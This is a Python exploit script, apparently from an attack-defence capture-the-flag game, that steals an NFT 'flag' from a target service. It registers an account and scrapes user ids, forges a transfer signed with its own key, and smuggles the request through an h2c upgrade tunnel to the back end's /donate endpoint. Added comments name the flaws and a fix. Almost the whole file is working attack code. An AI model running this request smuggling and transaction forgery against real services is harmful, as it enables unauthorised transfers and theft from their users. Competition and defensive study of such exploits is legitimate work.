#!/usr/bin/env python3
import subprocess
import sys
import requests
import random
import string
import re
import json
import re
from service1_common import *
# This exploit uses the h2c smuggling tunnel to donate the flag to itself.
# Besides donate, many other attacks against transactions are possible through the same tunnel.
def randstr(n, l=False, dictionary=string.ascii_letters):
    """Return a random string whose characters are drawn from `dictionary`.

    With only `n` given, the result is exactly `n` characters long. When `l`
    is truthy, the length is picked uniformly from [n, l] (inclusive, via
    random.randint). This uses the `random` module, so the output is
    predictable and not suitable where unguessability matters (use `secrets`
    for that).
    """
    length = random.randint(n, l) if l else n
    return ''.join(random.choice(dictionary) for _ in range(length))
def create_user_cred():
    """Return a fresh (username, password) pair, each 6 to 9 random letters.

    The username is drawn before the password, so the consumption of the
    `random` stream matches the two-statement form.
    """
    return randstr(6, 9), randstr(6, 9)
def exploit(ip, flag_id):
    """Transfer the NFT `flag_id` to a newly registered account and read the flag.

    Args:
        ip: target host; the service is addressed on port 3003 (see base_url).
        flag_id: NFT id; its owner is scraped from the /view/<flag_id> page.

    Returns:
        The first element returned by find_flag() over the new account's
        /dashboard page. Client, Key and find_flag come from service1_common,
        which is not shown here.

    Note:
        If either user id cannot be scraped, a message is printed and quit()
        is called, so this function does not return in that case.
    """
    base_url = f'http://{ip}:3003'
    sess = requests.Session()  # not used below; requests go through client.sess
    username, password = create_user_cred()
    client = Client(ip, username, password)
    key = Key()  # not used below; signing uses client.key
    # register an account
    client.register_user()
    # Retrieve the flag user id
    flag_page = requests.get(base_url + '/view/' + flag_id)
    # Greedy (.*) up to the last '" ' on the line; assumes one such href per page
    user_regex = r'href="/user/(.*)" '
    flag_user_id = re.findall(user_regex, flag_page.text)
    try:
        flag_user_id = flag_user_id[0]
    except:
        # Bare except: the failure actually expected here is IndexError on an
        # empty findall() result; the bare form also swallows KeyboardInterrupt.
        print('Cannot retrieve the flag owner user_id')
        quit()
    # Retrieve our user id
    index = client.sess.get(base_url)
    user_regex = r' user_id: \'(.*)\''
    user_id = re.findall(user_regex, index.text)
    try:
        user_id = user_id[0]
    except:
        print('Cannot retrieve our owner user_id')
        quit()
    # The signed blob carries the victim as from_addr but is signed with the
    # attacker's own key (client.key), and the matching pubkey is sent along.
    # NOTE(review): presumably the back end checks the signature against the
    # supplied pubkey rather than against the key registered for from_addr;
    # binding the verification key to from_addr server-side would close this.
    blob = f"{{\"nft_id\":\"{flag_id}\",\"from_addr\":\"{flag_user_id}\",\"to_addr\":\"{user_id}\"}}"
    signature = client.key.sign(blob)
    privkey, pubkey = client.key.get_keys_hex()
    data = {
        'nft_id': flag_id,
        'from_addr': flag_user_id,
        'to_addr': user_id,
        'pubkey': pubkey,
        'signature': signature
    }
    # json.dumps key order matches the blob above (nft_id, from_addr, to_addr)
    payload = json.dumps(data)
    # Call h2c-smuggler
    payload_length = len(payload)
    # The public /socket.io endpoint is used as the h2c upgrade point and the
    # request is re-issued against http://localhost/donate, i.e. the back end
    # as seen from the front end. Defensive takeaway: the front end should not
    # forward the Upgrade: h2c header, and /donate should be authorised at the
    # back end rather than only at the proxy.
    # The whole command is one shell string; a "'" in any interpolated value
    # (payload, ids scraped from HTML) breaks the quoting. An argv list with
    # shell=False would avoid that.
    cmd_line = f"python3 service1-h2c-smuggler.py -x 'http://{ip}:3003/socket.io' -H 'Content-Type: application/json' -H 'Content-Length: {payload_length}' -X POST --data '{payload}' http://localhost/donate"
    with open('/dev/null', 'w') as devnull:  # subprocess.DEVNULL is the stdlib equivalent
        subprocess.run(cmd_line, shell=True, stdout=devnull)
    # The smuggler's output and exit status are discarded; success is judged
    # solely by whether the flag shows up on our dashboard.
    resp = client.sess.get(base_url + '/dashboard')
    return find_flag(resp.text)[0]
if __name__ == "__main__":
    # CLI: <team_id> <flag_id>; the target address is derived from the team id.
    team_id, flag_id = sys.argv[1], sys.argv[2]
    target_ip = f"10.60.{team_id}.1"
    print(exploit(target_ip, flag_id))